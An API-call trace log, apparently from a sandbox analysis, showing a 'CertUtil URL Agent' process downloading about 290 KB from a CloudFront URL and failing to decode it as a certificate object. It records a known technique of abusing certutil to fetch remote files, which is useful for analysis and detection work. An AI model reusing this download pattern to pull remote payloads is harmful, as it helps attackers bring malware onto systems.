[0042.169] lstrcmpW (lpString1="*", lpString2="https://dl6zxn23r8r14.cloudfront.net:443/en-US") returned -1
[0042.169] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="https://dl6zxn23r8r14.cloudfront.net:443/en-US", cchCount1=-1, lpString2="crl", cchCount2=-1) returned 3
[0042.169] CryptRetrieveObjectByUrlW (in: pszUrl="https://dl6zxn23r8r14.cloudfront.net:443/en-US", pszObjectOid=0x5, dwRetrievalFlags=0x5, dwTimeout=0x0, ppvObject=0x4d316bf150, hAsyncRetrieve=0x0, pCredentials=0x0, pvVerify=0x0, pAuxInfo=0x0 | out: ppvObject=0x4d316bf150*=0x0, pAuxInfo=0x0) returned 0
[0043.718] GetLastError () returned 0x80092009
[0043.718] _wcsnicmp (_String1="https", _String2="ldap:", _MaxCount=0x5) returned -4
[0043.718] _vsnwprintf (in: _Buffer=0x4d316bf068, _BufferCount=0xb, _Format="%d", _ArgList=0x4d316bf058 | out: _Buffer="2232") returned 4
[0043.718] LoadStringW (in: hInstance=0x7ff6baf50000, uID=0x8b8, lpBuffer=0x4d316bee30, cchBufferMax=128 | out: lpBuffer="Online") returned 0x6
[0043.719] LocalAlloc (uFlags=0x0, uBytes=0xe) returned 0x4d31960270
[0043.719] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24
[0043.719] _vsnwprintf (in: _Buffer=0x4d316be050, _BufferCount=0x1ff, _Format="**** %ws ****\n", _ArgList=0x4d316bf0a8 | out: _Buffer="**** Online ****\n") returned 19
[0043.719] GetFileType (hFile=0x24) returned 0x2
[0043.719] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x4d316be050*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x4d316be004, lpReserved=0x0 | out: lpBuffer=0x4d316be050*, lpNumberOfCharsWritten=0x4d316be004*=0x13) returned 1
[0043.722] GetModuleHandleW (lpModuleName="api-ms-win-core-delayload-l1-1-1.dll") returned 0x7ffb3a800000
[0043.722] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadedAPI") returned 0x7ffb3a85a1b0
[0043.722] GetProcAddress (hModule=0x7ffb3a800000, lpProcName="ResolveDelayLoadsFromDll") returned 0x7ffb3a8be790
[0043.722] ResolveDelayLoadedAPI () returned 0x7ffb2e5c1140
[0043.724] InternetOpenW (lpszAgent="CertUtil URL Agent", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004
[0043.741] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://dl6zxn23r8r14.cloudfront.net:443/en-US", lpszHeaders="Accept: */*\r\n", dwHeadersLength=0xffffffff, dwFlags=0x80001000, dwContext=0x0) returned 0xcc000c
[0044.523] InternetQueryDataAvailable (hFile=0xcc000c, lpdwNumberOfBytesAvailable=0x4d316be030, dwFlags=0x0, dwContext=0x0) returned 1
[0044.524] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.524] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d337d83e0
[0044.525] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.525] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d337e83f0
[0044.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.526] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d337f8400
[0044.526] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.681] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33808410
[0044.681] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.682] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33818420
[0044.682] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.682] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33828430
[0044.683] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.683] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d319acec0
[0044.684] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.686] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d319bced0
[0044.686] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.686] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33838440
[0044.686] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.687] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33848450
[0044.687] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.821] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33858460
[0044.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.822] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33868470
[0044.822] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.823] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33878480
[0044.824] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.825] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33888490
[0044.825] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.827] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d338c0080
[0044.828] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.829] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d338d0090
[0044.829] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.829] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d338e00a0
[0044.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.830] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d338f00b0
[0044.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.834] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339000c0
[0044.834] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.834] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339100d0
[0044.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.835] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339200e0
[0044.835] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.835] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339300f0
[0044.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.836] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33940100
[0044.836] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.836] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33950110
[0044.837] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.990] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33960120
[0044.991] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.991] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33970130
[0044.991] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.992] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33980140
[0044.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.992] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33990150
[0044.992] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.992] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339a0160
[0044.993] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.993] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339b0170
[0044.994] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.994] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339c0180
[0044.994] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.995] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339d0190
[0044.995] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.995] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339e01a0
[0044.995] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.995] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d339f01b0
[0044.996] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.996] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a001c0
[0044.996] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0044.996] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a101d0
[0044.997] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.000] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a201e0
[0045.001] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.001] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a301f0
[0045.001] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.001] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a40200
[0045.002] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.002] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a50210
[0045.002] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.007] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a60220
[0045.009] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.009] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a70230
[0045.010] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.010] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a80240
[0045.010] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.011] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33a90250
[0045.011] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.011] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33aa0260
[0045.011] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.011] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33ac0080
[0045.012] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.013] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33ad0090
[0045.013] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.013] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33ae00a0
[0045.014] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.014] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33af00b0
[0045.014] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.014] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b000c0
[0045.015] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.015] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b100d0
[0045.015] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.112] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b200e0
[0045.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.113] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b300f0
[0045.113] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.113] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b40100
[0045.114] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.114] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b50110
[0045.115] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.117] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b60120
[0045.118] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.118] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b70130
[0045.118] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.118] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b80140
[0045.119] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.119] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33b90150
[0045.119] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.125] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33ba0160
[0045.126] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.127] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33bb0170
[0045.127] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.127] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33bc0180
[0045.127] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.128] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33bd0190
[0045.128] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.128] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33be01a0
[0045.128] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.129] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33bf01b0
[0045.129] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.129] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c001c0
[0045.129] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.130] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c101d0
[0045.130] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.136] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c201e0
[0045.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.136] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c301f0
[0045.136] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.137] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c40200
[0045.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x1000) returned 1
[0045.137] LocalAlloc (uFlags=0x0, uBytes=0x10000) returned 0x4d33c50210
[0045.137] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x7e) returned 1
[0045.138] LocalAlloc (uFlags=0x0, uBytes=0x7e0) returned 0x4d337cc2f0
[0045.138] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x4d316be050, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x4d316be034 | out: lpBuffer=0x4d316be050*, lpdwNumberOfBytesRead=0x4d316be034*=0x0) returned 1
[0045.139] LocalAlloc (uFlags=0x0, uBytes=0x4707e) returned 0x4d33c60220
[0045.142] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x2, pbEncoded=0x4d33c60220, cbEncoded=0x4707e, dwFlags=0x8000, pDecodePara=0x4d316bdc80, pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40 | out: pvStructInfo=0x4d316bdd20, pcbStructInfo=0x4d316bdd40) returned 0
[0045.142] GetLastError () returned 0x8009310b
